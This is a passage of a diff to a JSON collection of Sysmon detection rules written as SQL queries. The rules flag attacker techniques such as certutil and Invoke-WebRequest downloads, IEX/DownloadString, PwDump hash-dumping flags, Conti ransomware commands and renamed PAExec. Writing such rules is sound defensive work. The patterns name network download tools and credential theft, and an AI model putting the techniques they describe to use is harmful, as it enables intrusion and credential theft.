ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((Image LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_conhost_susp_parent.yml" + "filename": "proc_creation_win_renamed_mavinject.yml" }, { - "title": "Renamed Msdt.EXE Execution", - "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", + "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", "status": "experimental", - "description": "Detects the execution of a renamed \"Msdt.exe\" binary", - "author": "pH-T (Nextron Systems)", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'msdt.exe' AND NOT (Image LIKE '%\\\\msdt.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_msdt.yml" + "filename": "proc_creation_win_certutil_download_direct_ip.yml" }, { - "title": "VsCode Child Process Anomaly", - "id": "5a3164f2-b373-4152-93cf-090b13c12d27", - "status": "experimental", - "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Processes Suspicious Parent Directory", + "id": "96036718-71cc-4027-a538-d1587e0006a7", + "status": "test", + "description": "Detect suspicious parent processes of well-known Windows processes", + "author": "vburov", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1036.003", + "attack.t1036.005" ], "falsepositives": [ - "In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly" + "Some security products seem to spawn these" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\code.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-Expressions%' ESCAPE '\\' OR CommandLine LIKE '%IEX%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')) OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsaiso.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\') AND NOT (((ParentImage LIKE '%\\\\SavService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (ParentImage = '' OR ParentImage = '-')))" ], - "filename": "proc_creation_win_vscode_child_processes_anomalies.yml" + "filename": "proc_creation_win_susp_proc_wrong_parent.yml" }, { - "title": "Potential Windows Defender Tampering Via Wmic.EXE", - "id": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", + "title": "Ilasm Lolbin Use Compile C-Sharp", + "id": "850d55f9-6eeb-4492-ad69-a72338f65ba4", "status": "experimental", - "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", + "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '%/Namespace:\\\\\\\\root\\\\Microsoft\\\\Windows\\\\Defender%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ilasm.exe' ESCAPE '\\' OR OriginalFileName = 'ilasm.exe'))" ], - "filename": "proc_creation_win_wmic_namespace_defender.yml" + "filename": "proc_creation_win_lolbin_ilasm.yml" }, { - "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", - "id": "ef61af62-bc74-4f58-b49b-626448227652", - "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Formbook Process Creation", + "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "status": "test", + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" + "filename": "proc_creation_win_malware_formbook.yml" }, { - "title": "Suspicious Scan Loop Network", - "id": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", + "title": "Suspicious Diantz Alternate Data Stream Execution", + "id": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", "status": "test", - "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", + "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059", - "attack.discovery", - "attack.t1018" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate script" + "Very Possible" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%foreach %' ESCAPE '\\') AND (CommandLine LIKE '%nslookup%' ESCAPE '\\' OR CommandLine LIKE '%ping%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" ], - "filename": "proc_creation_win_susp_network_scan_loop.yml" + "filename": "proc_creation_win_lolbin_diantz_ads.yml" }, { - "title": "New Service Creation Using PowerShell", - "id": "c02e96b7-c63a-4c47-bd83-4a9f74afcfb2", + "title": "Potential Conti Ransomware Activity", + "id": "689308fc-cfba-4f72-9897-796c1dc61487", "status": "test", - "description": "Detects the creation of a new service using powershell.", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "description": "Detects a specific command used by the Conti ransomware group", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.impact", + "attack.s0575", + "attack.t1486" ], "falsepositives": [ - "Legitimate administrator or user creates a service for legitimate reasons.", - "Software installation" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_create_service.yml" + "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" }, { - "title": "GfxDownloadWrapper.exe Downloads File from Suspicious URL", - "id": "eee00933-a761-4cd0-be70-c42fe91731e7", - "status": "test", - "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", - "author": "Victor Sergeev, oscd.community", + "title": "HackTool - Quarks PwDump Execution", + "id": "0685b176-c816-4837-8e7b-1216f346636b", + "status": "experimental", + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%gameplayapi.intel.com%' ESCAPE '\\' AND (ParentImage LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\igfxEM.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" ], - "filename": "proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml" + "filename": "proc_creation_win_hktl_quarks_pwdump.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", - "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", - "status": "experimental", - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Share And Session Enumeration Using Net.EXE", + "id": "62510e69-616b-4078-b371-847da438cc03", + "status": "stable", + "description": "Detects attempts to enumerate file shares, printer shares and sessions using \"net.exe\" with the \"view\" flag.", + "author": "Endgame, JHasenbusch (ported for oscd.community)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Unknown" + "Legitimate use of net.exe utility by legitimate user" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '%view%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" + "filename": "proc_creation_win_net_share_and_sessions_enum.yml" }, { - "title": "Harvesting Of Wifi Credentials Via Netsh.EXE", - "id": "42b1a5b8-353f-4f10-b256-39de4467faff", + "title": "Execution via CL_Invocation.ps1", + "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", "status": "test", - "description": "Detect the harvesting of wifi credentials using netsh.exe", - "author": "Andreas Hunkeler (@Karneades), oscd.community", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%wlan%' ESCAPE '\\' AND CommandLine LIKE '% s%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '% k%' ESCAPE '\\' AND CommandLine LIKE '%=clear%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml" + "filename": "proc_creation_win_lolbin_cl_invocation.yml" }, { - "title": "Exports Critical Registry Keys To a File", - "id": "82880171-b475-4201-b811-e9c826cd5eaa", - "status": "test", - "description": "Detects the export of a crital Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Suspicious Invoke-WebRequest Execution", + "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "status": "experimental", + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_export_critical_keys.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" }, { - "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", - "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", - "status": "experimental", - "description": "Detects active directory enumeration activity using known AdFind CLI flags", - "author": "frack113", + "title": "Suspicious Child Process Created as System", + "id": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", + "status": "test", + "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", + "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.privilege_escalation", + "attack.t1134.002" ], "falsepositives": [ - "Authorized administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (ParentUser LIKE '%\\\\NETWORK SERVICE' ESCAPE '\\' OR ParentUser LIKE '%\\\\LOCAL SERVICE' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%\\\\SYSTEM' ESCAPE '\\' OR User LIKE '%\\\\Système' ESCAPE '\\' OR User LIKE '%\\\\СИСТЕМА' ESCAPE '\\') AND IntegrityLevel = 'System') AND NOT ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%DavSetCookie%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_enumeration.yml" + "filename": "proc_creation_win_susp_child_process_as_system_.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share", - "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "title": "PsExec Service Execution", + "id": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", + "author": "Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' OR OriginalFileName = 'psexesvc.exe'))" ], - "filename": "proc_creation_win_powershell_mailboxexport_share.yml" + "filename": "proc_creation_win_sysinternals_psexesvc.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - ProcCreation", - "id": "70bc5215-526f-4477-963c-a47a5c9ebd12", - "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "frack113", + "title": "PUA - NirCmd Execution As LOCAL SYSTEM", + "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "status": "test", + "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Legitimate use by administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\') AND CommandLine LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_pua_nircmd_as_system.yml" }, { - "title": "Base64 Encoded PowerShell Command Detected", - "id": "e32d4572-9826-4738-b651-95fa63747e8a", + "title": "Renamed PAExec Execution", + "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", "status": "test", - "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of renamed version of PAExec. Often used by attackers", + "author": "Florian Roth (Nextron Systems), Jason Lynch", "tags": [ - "attack.t1027", "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" + "attack.t1202" ], "falsepositives": [ - "Administrative script libraries" + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\paexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_frombase64string.yml" + "filename": "proc_creation_win_renamed_paexec.yml" }, { - "title": "Lolbin Defaultpack.exe Use As Proxy", - "id": "b2309017-4235-44fe-b5af-b15363011957", + "title": "Msiexec Quiet Installation", + "id": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", "status": "experimental", - "description": "Detect usage of the \"defaultpack.exe\" binary as a proxy to launch other programs", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", "author": "frack113", "tags": [ - "attack.t1218", "attack.defense_evasion", - "attack.execution" + "attack.t1218.007" ], "falsepositives": [ - "Unknown" + "WindowsApps installing updates via the quiet flag" ], "level": "medium", 